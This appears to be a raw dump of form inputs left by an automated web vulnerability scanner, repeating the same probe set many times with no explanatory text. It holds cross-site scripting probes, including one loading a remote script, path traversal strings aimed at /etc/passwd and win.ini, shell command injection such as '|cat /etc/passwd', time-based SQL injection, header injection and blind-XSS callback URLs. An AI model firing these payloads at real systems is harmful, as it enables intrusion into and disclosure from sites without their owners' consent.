1'"()&%<ScRiPt >prompt(988019)</ScRiPt>

1

1

<!--

1

|dir

D6lqRBjX'))

'"()&%<ScRiPt >prompt(938174)</ScRiPt>

1

file:///etc/passwd

1

1

1

1

'|dir

1

1_907031

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

acu10143<s1﹥s2ʺs3ʹuca10143

1

../../../../../../../../../../windows/win.ini

1

acux5966z1z2abcxuca5966

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(918693)</ScRiPt>

1

1

1<script>prompt(931666)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(921201)</ScRiPt>

windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?920318></ScRiPt>

1

................windowswin.ini

1

1<ScRiPt >prompt(917039)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<video><source onerror="javascript:prompt(939574)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947084)"></g></svg>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(967859))>

response.write(9070152*9876163)

1

1

1

1<iframe src='data:text/html

1

'+response.write(9070152*9876163)+'

1

1

&cat /etc/passwd&

WEB-INF/web.xml

1<body onload=prompt(969984)>

"+response.write(9070152*9876163)+"

1

'&cat /etc/passwd&'

1

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927397)>

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=xyz OnErRor=prompt(924612)>

1

if(now()=sysdate(),sleep(6.97),0)/*'XOR(if(now()=sysdate(),sleep(6.97),0))OR'"XOR(if(now()=sysdate(),sleep(6.97),0))OR"*/

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img/src=">" onerror=alert(990834)>

1

1

1

1

(select(0)from(select(sleep(6.97)))v)/*'+(select(0)from(select(sleep(6.97)))v)+'"+(select(0)from(select(sleep(6.97)))v)+"*/

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

${99720+99750}

1<ScRiPt%20>prompt(939412)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1&n976225=v982883

-1

|cat /etc/passwd#

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

1&lt

1

1

-1)

1

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

<img acu onmouseover=prompt(913932) //>

-1))

!(()&&!|*|*|

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

1

'"()

^(#$!@#$)(()))******

q9neseMk'

1<input autofocus onfocus=prompt(913186)>

'

.\./.\./.\./.\./.\./.\./etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

UL6XCI2E')

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

TVG3yLeT'))

1

'

[url=http://www.acunetix.com]website security[/url]

http://hitX6ODzNlHTP.bxss.me/

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1_b6KLj <ScRiPt >prompt(945167)</ScRiPt>

1

-1

1

"

1

1

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1)

1

1

||cat /etc/passwd

1

1

comments

................etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

http://www.acunetix.tst

&dir

'"

1

1

comments

1

1

cQEE84GD'

<!--

1

'&dir&'

1

1

comments/.

file:///etc/passwd

1'"()&%<ScRiPt >prompt(977484)</ScRiPt>

spMuDtjJ')

1

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(917950)</ScRiPt>

LsiXk90H'))

1

|dir

1_924240

1

1

WEB-INF/web.xml

1

'|dir

1

WEB-INF\web.xml

"|dir

1

acu3853<s1﹥s2ʺs3ʹuca3853

acux10328z1z2abcxuca10328

1

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(945269)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(942748)</script>

1

1

1

1

windowswin.ini

1<ScRiPt >prompt(972834)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906315></ScRiPt>

1

1

1

1<ScRiPt >prompt(915578)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<video><source onerror="javascript:prompt(933833)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973668)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(953308))>

1

1

response.write(9007017*9022865)

1

1

1

1<iframe src='data:text/html

'+response.write(9007017*9022865)+'

1

1

WEB-INF/web.xml

1<body onload=prompt(981971)>

1

&cat /etc/passwd&

"+response.write(9007017*9022865)+"

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(910265)>

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img src=xyz OnErRor=prompt(900204)>

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

1

1<img/src=">" onerror=alert(929254)>

if(now()=sysdate(),sleep(3.141),0)/*'XOR(if(now()=sysdate(),sleep(3.141),0))OR'"XOR(if(now()=sysdate(),sleep(3.141),0))OR"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

cat /etc/passwd

1

1

1<ScRiPt%20>prompt(932907)</sCripT>

1

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3.141)))v)/*'+(select(0)from(select(sleep(3.141)))v)+'"+(select(0)from(select(sleep(3.141)))v)+"*/

1

1&lt

1

${100102+99362}

1

1

|cat /etc/passwd#

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

<img acu onmouseover=prompt(946641) //>

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

'|'ld

1&n945282=v940346

)

.\./.\./.\./.\./.\./.\./etc/passwd

1<input autofocus onfocus=prompt(913086)>

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1

!(()&&!|*|*|

1

"|"ld

<a href='http://www.acunetix.com'>website security</a>

'"()

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Bhy3BXUC'

testasp.vulnweb.com

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1_XukAj <ScRiPt >prompt(904935)</ScRiPt>

'

1

1

68owzTbz')

1

"

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hitUBZ52PPXF5.bxss.me/

1

8YzXVMeu'))

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

................etc/passwd

1

1

1

-1

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

-1)

1

'"

1

1

file:///etc/passwd

comments

http://www.acunetix.tst

'&dir&'

-1))

1'"()&%<ScRiPt >prompt(936979)</ScRiPt>

1

<!--

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

"&dir&"

jPHHB0Pg'

'"()&%<ScRiPt >prompt(906254)</ScRiPt>

1

1

WEB-INF/web.xml

1

1

1

1_973070

|dir

xUyw3sH6')

1

1

1

1

WEB-INF\web.xml

acu8351<s1﹥s2ʺs3ʹuca8351

1

Z1aQ3PMX'))

'|dir

1

../../../../../../../../../../windows/win.ini

1

acux9627z1z2abcxuca9627

1

"|dir

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(987756)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(958342)</script>

1

1<ScRiPt >prompt(910613)</ScRiPt>

windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961366></ScRiPt>

................windowswin.ini

1

1<ScRiPt >prompt(922599)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(963745)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(902794)"></g></svg>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1

1<div style=width:expression(prompt(915438))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<body onload=prompt(991125)>

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(974650)>

WEB-INF/web.xml

1

response.write(9807727*9075375)

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(992030)>

1

1

1

1

'+response.write(9807727*9075375)+'

1

1<img/src=">" onerror=alert(982551)>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<ScRiPt%20>prompt(951463)</sCripT>

"+response.write(9807727*9075375)+"

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1&lt

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

<img acu onmouseover=prompt(906580) //>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

1<input autofocus onfocus=prompt(997201)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

${99061+99213}

1

`cat /etc/passwd`

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

<a href='http://www.acunetix.com'>website security</a>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

1

1

1

|cat /etc/passwd#

[url=http://www.acunetix.com]website security[/url]

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

-1)

1&n944382=v972472

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1_EygqE <ScRiPt >prompt(916044)</ScRiPt>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

'|'ld

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

1

'"()

1

testasp.vulnweb.com

1

1YGyxXml'

"|"ld

^(#$!@#$)(()))******

1

S7iZLO9j')

/etc/passwd

1

1

'

1

1

1

1

sWZ019bG'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

1

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hit3e3Ktjg8PL.bxss.me/

1

"

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

................etc/passwd

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

1

1

1

-1))

1

comments

1

1

&dir

http://www.acunetix.tst

1

'"

comments

1'"()&%<ScRiPt >prompt(998374)</ScRiPt>

3mMM4zTL'

file:///etc/passwd

1

'&dir&'

1

1

comments/.

KPqQYkC1')

'"()&%<ScRiPt >prompt(959458)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

oPlg5Ap1'))

<!--

1

1_944259

1

WEB-INF/web.xml

1

1

|dir

1

1

WEB-INF\web.xml

1

acu8317<s1﹥s2ʺs3ʹuca8317

../../../../../../../../../../windows/win.ini

'|dir

1

1

../../../../../../../../../../boot.ini

acux1249z1z2abcxuca1249

1

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(989035)</ScRiPt>

1

1<script>prompt(987396)</script>

1

1

1

windowswin.ini

1<ScRiPt >prompt(995105)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906314></ScRiPt>

................windowswin.ini

1

1<ScRiPt >prompt(932769)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(912817)">

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947766)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(931993))>

1

1

1

1<iframe src='data:text/html

1

1

1

WEB-INF/web.xml

1<body onload=prompt(903624)>

1

WEB-INF\web.xml

1

response.write(9092688*9942926)

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(962244)>

1

1

&cat /etc/passwd&

'+response.write(9092688*9942926)+'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1<img src=xyz OnErRor=prompt(974881)>

'&cat /etc/passwd&'

"+response.write(9092688*9942926)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(950467)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<ScRiPt%20>prompt(978904)</sCripT>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

cat /etc/passwd

1&lt

1

${100490+100037}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

1&n903419=v912544

1

<img acu onmouseover=prompt(912250) //>

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

1

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1<input autofocus onfocus=prompt(920269)>

-1)

1

testasp.vulnweb.com

1

'|'ld

1

-1))

<a href='http://www.acunetix.com'>website security</a>

1

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

'

1

"|"ld

'"()

[url=http://www.acunetix.com]website security[/url]

rX3yNGL3'

1

1

/etc/passwd

"

^(#$!@#$)(()))******

1

1

fRHaC8AQ')

1_t3OeI <ScRiPt >prompt(912768)</ScRiPt>

1

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

xCzE3ZIc'))

1

1

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}\

-1

1

1

1

1

1

||cat /etc/passwd

................etc/passwd

http://hittaEW0EFUp0.bxss.me/

1

1

acunetix_wvs_invalid_filename

1

-1)

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1

http://www.acunetix.tst

comments

1

1

-1))

1

'&dir&'

file:///etc/passwd

comments

1

1'"()&%<ScRiPt >prompt(963086)</ScRiPt>

'"

1

137ZY7xN'

1

comments/.

<!--

'"()&%<ScRiPt >prompt(963833)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

ZtXInIi4')

1

1

1

1

|dir

WEB-INF/web.xml

1_914853

1

vl6SX19B'))

1

1

1

WEB-INF\web.xml

1

1

1

'|dir

1

../../../../../../../../../../windows/win.ini

acu4361<s1﹥s2ʺs3ʹuca4361

1

1

1

1

"|dir

acux5078z1z2abcxuca5078

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(939537)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(991938)</script>

1

1<ScRiPt >prompt(912539)</ScRiPt>

1

1

windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936240></ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(907739)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(900883)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972755)"></g></svg>

/.\./.\./.\./.\./.\./.\./windows/win.ini

response.write(9951554*9991853)

1

1

1

1<div style=width:expression(prompt(997970))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'+response.write(9951554*9991853)+'

1

1

1

&cat /etc/passwd&

1

1<iframe src='data:text/html

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"+response.write(9951554*9991853)+"

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(903491)>

../../../../../../../../../../etc/passwd

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983393)>

WEB-INF/web.xml

1

if(now()=sysdate(),sleep(3.125),0)/*'XOR(if(now()=sysdate(),sleep(3.125),0))OR'"XOR(if(now()=sysdate(),sleep(3.125),0))OR"*/

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(947535)>

1

WEB-INF\web.xml

(select(0)from(select(sleep(3.125)))v)/*'+(select(0)from(select(sleep(3.125)))v)+'"+(select(0)from(select(sleep(3.125)))v)+"*/

1

${99974+100035}

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n944981=v942143

1<img/src=">" onerror=alert(980650)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

-1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(916602)</sCripT>

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

-1)

)

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

1

"|"ld

-1))

<img acu onmouseover=prompt(942103) //>

testasp.vulnweb.com

.\./.\./.\./.\./.\./.\./etc/passwd

'"()

^(#$!@#$)(()))******

1

1

1<input autofocus onfocus=prompt(901548)>

1

/etc/passwd

FhHg39m7'

'

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

[url=http://www.acunetix.com]website security[/url]

uxZJgpsL')

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"

1

mf0e5uUs'))

1_H67ds <ScRiPt >prompt(973620)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

................etc/passwd

1

||cat /etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

-1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

&dir

http://hit9igEZEhgCl.bxss.me/

1

1

1

file:///etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

1

acunetix_wvs_invalid_filename

1

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

1

http://www.acunetix.tst

1

1

1

comments

'"

"&dir&"

1'"()&%<ScRiPt >prompt(983132)</ScRiPt>

WEB-INF/web.xml

1

1

1

-1))

comments

<!--

|dir

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(923336)</ScRiPt>

XqpBh59h'

comments/.

1

'|dir

1

1

K4UBmhcX')

1

1

../../../../../../../../../../windows/win.ini

1_962043

"|dir

1

1

ZuSIhj6t'))

../../../../../../../../../../boot.ini

1

1

1

1

acu9662<s1﹥s2ʺs3ʹuca9662

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acux9805z1z2abcxuca9805

1

1

1

windowswin.ini

1<ScRiPt >prompt(939578)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(910777)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(965505)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959512></ScRiPt>

1

1<ScRiPt >prompt(907350)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(976388)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(997723)"></g></svg>

1

1

1

response.write(9136188*9123152)

1

1<div style=width:expression(prompt(968346))>

1

'+response.write(9136188*9123152)+'

1

1

1

1<iframe src='data:text/html

1

WEB-INF/web.xml

"+response.write(9136188*9123152)+"

1

&cat /etc/passwd&

1<body onload=prompt(949201)>

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(950260)>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=xyz OnErRor=prompt(935501)>

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img/src=">" onerror=alert(967103)>

1

1

1

${99222+99138}

1

|cat /etc/passwd#

1<ScRiPt%20>prompt(900190)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

1

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1&n933134=v903251

)

"|"ld

<img acu onmouseover=prompt(960023) //>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

1<input autofocus onfocus=prompt(970059)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

'"()

1

testasp.vulnweb.com

7qZfobmv'

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

'

1

1

1

'

HBAXpq9B')

1

[url=http://www.acunetix.com]website security[/url]

1

1

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

GOz9XJrP'))

1_hpqnQ <ScRiPt >prompt(911732)</ScRiPt>

1

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

http://hitj7Zz6DbCU8.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

1

comments

1

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

................etc/passwd

-1)

1

1

comments

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1

1

-1))

file:///etc/passwd

comments/.

"&dir&"

1

'"

1

1

1

1'"()&%<ScRiPt >prompt(971312)</ScRiPt>

bYsuojeh'

/\../\../\../\../\../\../\../etc/passwd

1

1

<!--

|dir

'"()&%<ScRiPt >prompt(971581)</ScRiPt>

zMmpr9ff')

1

WEB-INF/web.xml

1

1

1

'|dir

1

1_924132

1

1

qwrEdTXk'))

1

WEB-INF\web.xml

1

"|dir

1

1

1

1

../../../../../../../../../../windows/win.ini

../../../../../../../../../../boot.ini

1

1

acu6674<s1﹥s2ʺs3ʹuca6674

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux6778z1z2abcxuca6778

1

windowswin.ini

1

1<ScRiPt >prompt(984841)</ScRiPt>

1

................windowswin.ini

1

1

1

1<script>prompt(902379)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(939331)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990638></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(920814)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(991710)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947556)"></g></svg>

1

response.write(9687338*9271528)

1

1

1<div style=width:expression(prompt(986694))>

1

1

'+response.write(9687338*9271528)+'

1

WEB-INF/web.xml

1<iframe src='data:text/html

1

1

WEB-INF\web.xml

1<body onload=prompt(962457)>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9687338*9271528)+"

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987619)>

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(6.158),0)/*'XOR(if(now()=sysdate(),sleep(6.158),0))OR'"XOR(if(now()=sysdate(),sleep(6.158),0))OR"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(984614)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(6.158)))v)/*'+(select(0)from(select(sleep(6.158)))v)+'"+(select(0)from(select(sleep(6.158)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(999067)>

${99936+99939}

1

1

1

cat /etc/passwd

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(991082)</sCripT>

1

1

1

1&n981034=v912252

1some_inexistent_file_with_long_name%00.jpg

`cat /etc/passwd`

-1)

1

1&lt

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

|cat /etc/passwd#

-1))

<img acu onmouseover=prompt(941738) //>

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

'|'ld

'"()

avwZuAP7'

^(#$!@#$)(()))******
